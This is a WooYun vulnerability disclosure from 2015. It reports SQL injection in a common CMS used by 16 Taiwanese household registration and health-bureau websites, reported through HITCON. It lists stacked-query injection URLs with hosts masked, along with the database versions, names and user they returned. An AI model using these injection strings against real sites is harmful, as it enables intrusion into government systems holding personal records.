台灣戶政事務所通用SQL注入漏洞-16站（臺灣地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0157777

漏洞标题：台灣戶政事務所通用SQL注入漏洞-16站（臺灣地區）

漏洞作者：路人甲

提交时间：2015-12-03 11:44

修复时间：2016-01-19 03:40

公开时间：2016-01-19 03:40

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-03：细节已通知厂商并且等待厂商处理中
2015-12-05：厂商已经确认，细节仅向厂商公开
2015-12-15：细节向核心白帽子及相关领域专家公开
2015-12-25：细节向普通白帽子公开
2016-01-04：细节向实习白帽子公开
2016-01-19：细节向公众公开

简要描述：

16站都是注入！　這台服務器也該檢查一下有沒有webshell吧..

详细说明：

都是注入！

漏洞证明：

http://**.**.**.**/bexfront.php?sid=bmddyna&item=detail&class=19&id=565;%20SELECT%20version%28%29
DB Version:
PostgreSQL 8.4.13 on i386-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.4.6 20120305 (Red Hat 4.4.6-4), 32-bit

高雄市美濃區戶政事務所資訊網
http://**.**.**.**/style/front001/bexfront.php?sid=bmddyna&item=detail&class=14&id=414;SELECT%20current_database%28%29
DB name: meinong-house
高雄市燕巢區戶政事務所
http://**.**.**.**/bexfront.php?sid=bmddyna&item=detail&class=20&id=193;SELECT%20current_database%28%29
DB name:yanchao-house
高雄市橋頭區戶政事務所全球資訊網
http://**.**.**.**/bexfront.php?sid=bmddyna&item=detail&class=21&id=543;SELECT%20current_database%28%29
DB name:ciaotou-house
高雄市茂林區戶政事務所
http://**.**.**.**/bexfront.php?sid=bmddyna&item=detail&class=10&id=406;SELECT%20current_database%28%29
DB name:maolin-house
屏東縣屏東市戶政事務所
http://**.**.**.**/bexfront.php?sid=bmddyna&item=detail&class=20&id=209;SELECT%20current_database%28%29
DB name:pingtung-house
高雄市桃源區戶政事務所資訊
http://**.**.**.**/style/front001/bexfront.php?sid=search&item=self&id=1921342994;SELECT%20current_database%28%29
DB name:taoyuan-house
高雄市大社區戶政事務所
http://**.**.**.**/bexfront.php?sid=bmddyna&item=detail&class=17&id=372;SELECT%20current_database%28%29
DB name:tashe-house
臺南市楠西區戶政事務所
http://**.**.**.**/bexfront.php?sid=bmddyna&item=detail&class=10&id=437;%20SELECT%20version%28%29
DB Version:
PostgreSQL 8.2.23 on i686-pc-mingw32, compiled by GCC gcc.exe (GCC) 3.4.2 (mingw-special)
http://**.**.**.**/bexfront.php?sid=bmddyna&item=detail&class=10&id=437;SELECT%20current_database%28%29
DB name:nanshi-house
高雄市旗山區戶政事務所
http://**.**.**.**/bexfront.php?sid=bmddyna&item=detail&class=22&id=112;%20SELECT%20version%28%29
DB Version:
PostgreSQL 8.2.23 on i686-pc-mingw32, compiled by GCC gcc.exe (GCC) 3.4.2 (mingw-special)
http://**.**.**.**/bexfront.php?sid=bmddyna&item=detail&class=22&id=112;SELECT%20current_database%28%29
DB name:cishan-house
嘉義縣梅山鄉公所資訊網
http://**.**.**.**/style/front001/bexfront.php?sid=bmddyna&item=detail&class=21&id=412;%20SELECT%20version%28%29
DB Version:
PostgreSQL 8.1.23 on x86_64-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20080704 (Red Hat 4.1.2-54)
http://**.**.**.**/style/front001/bexfront.php?sid=bmddyna&item=detail&class=21&id=412;SELECT%20current_database%28%29
DB name:meishan
高雄市大樹區戶政事務所
http://**.**.**.**/bexfront.php?sid=bmddyna&item=detail&class=14&id=638;%20SELECT%20version%28%29
DB Version:
PostgreSQL 8.2.23 on i686-pc-mingw32, compiled by GCC gcc.exe (GCC) 3.4.2 (mingw-special)
http://**.**.**.**/bexfront.php?sid=bmddyna&item=detail&class=14&id=638;SELECT%20current_database%28%29
DB name:dashu-house
屏東縣政府衛生局
http://**.**.**.**/style/front001/bexfront.php?sid=bmddyna&item=detail&class=8&id=875;%20SELECT%20version%28%29
DB Version:
PostgreSQL 8.2.16 on i686-pc-mingw32, compiled by GCC gcc.exe (GCC) 3.4.2 (mingw-special)
http://**.**.**.**/style/front001/bexfront.php?sid=bmddyna&item=detail&class=8&id=875;SELECT%20current_database%28%29
DB name:ptshb
高雄市橋頭區戶政事務所
http://**.**.**.**/bexfront.php?sid=bmddyna&item=detail&class=20&id=552;%20SELECT%20version%28%29
DB Version:
PostgreSQL 8.2.23 on i686-pc-mingw32, compiled by GCC gcc.exe (GCC) 3.4.2 (mingw-special)
http://**.**.**.**/bexfront.php?sid=bmddyna&item=detail&class=20&id=552;SELECT%20current_database%28%29
DB name:ciaotou-house
高雄市內門區戶政事務所
http://**.**.**.**/bexfront.php?sid=bmddyna&item=detail&class=21&id=291;%20SELECT%20version%28%29
DB Version:
PostgreSQL 8.2.23 on i686-pc-mingw32, compiled by GCC gcc.exe (GCC) 3.4.2 (mingw-special)
高雄市內門區戶政事務所
http://**.**.**.**/bexfront.php?sid=bmddyna&item=detail&class=21&id=291;SELECT%20current_database%28%29
DB name:neime-house
http://**.**.**.**/bexfront.php?sid=bmddyna&item=detail&class=21&id=291;%20SELECT%20current_user;
current_user:netsgo

修复方案：

建議過濾～

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-12-05 03:39

厂商回复：

感謝通報

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0157777

漏洞标题：台灣戶政事務所通用SQL注入漏洞-16站（臺灣地區）

相关厂商：高雄市戶政事務所

漏洞作者：路人甲

提交时间：2015-12-03 11:44

修复时间：2016-01-19 03:40

公开时间：2016-01-19 03:40

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0157777

漏洞标题：台灣戶政事務所通用SQL注入漏洞-16站（臺灣地區）

相关厂商：高雄市戶政事務所

漏洞作者： 路人甲

提交时间：2015-12-03 11:44

修复时间：2016-01-19 03:40

公开时间：2016-01-19 03:40

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0157777"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云